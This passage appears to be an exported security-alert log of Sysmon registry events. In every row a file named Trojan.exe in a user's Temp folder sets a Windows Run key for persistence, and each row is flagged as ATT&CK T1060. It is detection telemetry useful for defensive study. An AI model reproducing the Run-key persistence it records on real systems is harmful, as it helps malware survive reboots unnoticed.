HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:48.620489100Z"",""eventRecordID"":""1073"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:48.602\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:48.602"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:00.726",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:47.573 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:47.578628700Z"",""eventRecordID"":""1071"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:47.573\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:47.573"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:59.681",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:46.569 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:46.575411100Z"",""eventRecordID"":""1070"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:46.569\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:46.569"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:58.686",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:45.539 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:45.558946700Z"",""eventRecordID"":""1069"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:45.539\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:45.539"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:57.640",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:44.523 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:44.529430400Z"",""eventRecordID"":""1068"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:44.523\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:44.523"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:56.647",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:43.507 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:43.510588800Z"",""eventRecordID"":""1067"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:43.507\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:43.507"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:55.601",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:42.476 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:42.478269600Z"",""eventRecordID"":""1066"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:42.476\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:42.476"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:54.568",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:41.445 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:41.452858000Z"",""eventRecordID"":""1065"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:41.445\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:41.445"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:53.590",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:40.413 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:40.415509300Z"",""eventRecordID"":""1064"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:40.413\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:40.413"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:52.506",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:39.382 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:39.384943500Z"",""eventRecordID"":""1063"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:39.382\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:39.382"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:50.506",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:38.351 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:38.352192500Z"",""eventRecordID"":""1062"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:38.351\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:38.351"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:50.474",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:37.335 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 